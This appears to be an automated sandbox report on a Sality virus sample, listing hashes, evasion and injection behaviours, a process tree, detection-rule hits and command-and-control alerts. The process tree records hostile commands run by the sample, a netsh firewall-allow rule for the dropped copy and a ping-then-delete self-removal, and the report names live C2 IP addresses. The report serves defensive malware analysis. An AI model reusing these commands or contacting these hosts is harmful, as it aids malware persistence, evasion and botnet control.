
Windows Analysis Report
SecuriteInfo.com.Win32.Sector.30.15961.3704.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Analysis ID: 1536957
MD5: fa45b9c5e2a92b1b3d7d175c23ffc813
SHA1: 5832cef41cad1bc57ea1424572a3127a5ccba956
SHA256: 20d84dd8c73993a1012d7a9d9b837aa118182cb16daf4169a266c0b48a708af7
Tags: exe, Sality

Detection

Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject threads in other processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables the Smart Screen filter
Disables user account control notifications
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
Monitors registry run keys for changes
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.Sector.30.15961.3704.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • jvauyc32.exe (PID: 800 cmdline: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • cmd.exe (PID: 7236 cmdline: /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7288 cmdline: netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • jvauyc32.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • sihost.exe (PID: 3400 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3452 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3520 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3904 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • jvauyc32.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe" MD5: FA45B9C5E2A92B1B3D7D175C23FFC813)
      • svchost.exe (PID: 4336 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4812 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4912 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 5016 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 4472 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 4852 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 2780 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • ApplicationFrameHost.exe (PID: 6352 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 6380 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 6676 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • TextInputHost.exe (PID: 6720 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • svchost.exe (PID: 1156 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sedSmibSjDOiaD.exe (PID: 3440 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 7000 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 3332 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 6876 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 5796 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • sedSmibSjDOiaD.exe (PID: 7140 cmdline: "C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • cmd.exe (PID: 6132 cmdline: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7204 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
Name: Sality

Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware. Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult. Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Attribution:
  • Salty Spider

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe PID: 1376 | JoeSecurity_Sality | Yara detected Sality | Joe Security |

Source | Rule | Description | Author | Strings
1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x31904:$s1: Simple Poly Engine v
1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x22520:$s1: Simple Poly Engine v
1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x185c:$s1: Simple Poly Engine v

System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 190.120.227.91, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, Initiated: true, ProcessId: 1376, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentImage: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentProcessId: 800, ParentProcessName: jvauyc32.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", CommandLine: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ParentProcessId: 1376, ParentProcessName: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ProcessCommandLine: /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE", ProcessId: 6132, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ProcessId: 800, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\jvauyc32.exe
Source: Registry Key set | Author: frack113 | Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, ProcessId: 1376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentImage: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe, ParentProcessId: 800, ParentProcessName: jvauyc32.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3452, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T12:41:39.935484+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:53.402228+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:59.701403+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:06.031031+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49724 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:11.645323+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49726 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:17.298575+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49728 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:22.644756+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49730 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:28.989555+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49732 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:34.518806+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49736 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:41.055615+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49738 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:47.487267+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49741 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:54.346733+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49767 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:00.351728+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49789 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:05.816068+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49814 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:11.408873+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49842 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:17.555326+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49870 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:23.986856+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49899 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:31.472599+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:37.472929+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:43.404850+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:49.504205+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:55.528705+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:01.393948+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:07.519217+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:13.364041+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:19.380085+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:25.769055+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:32.108634+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:38.544056+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:44.568350+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:51.551466+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:57.651692+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:03.284445+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:09.512490+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:15.957815+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50056 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:21.957273+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50058 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:27.761668+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50060 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:33.753048+0200 | 2012736 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50062 | 190.120.227.91 | 8080 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-18T12:41:34.975221+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49707 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:39.935484+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:41.407737+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49712 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:49.368405+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49716 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:53.402228+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:55.419204+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49721 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:59.701403+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:01.531631+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49723 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:06.031031+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49724 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:07.602990+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49725 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:11.645323+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49726 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:13.239676+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49727 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:17.298575+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49728 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:18.602435+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49729 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:22.644756+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49730 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:24.726632+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49731 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:28.989555+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49732 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:30.465354+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49735 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:34.518806+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49736 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:36.979019+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49737 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:41.055615+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49738 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:42.705591+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49740 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:47.487267+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49741 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:49.865347+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49759 | 185.53.178.50 | 80 | TCP
2024-10-18T12:42:54.346733+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49767 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:42:56.008076+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49784 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:00.351728+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49789 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:01.755354+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49806 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:05.816068+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49814 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:07.131282+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49835 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:11.408873+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49842 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:12.995616+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49861 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:17.555326+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49870 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:19.906299+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49889 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:23.986856+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49899 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:25.649318+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49918 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:31.472599+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:33.227599+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49949 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:37.472929+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:39.087157+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49977 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:43.404850+0200 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
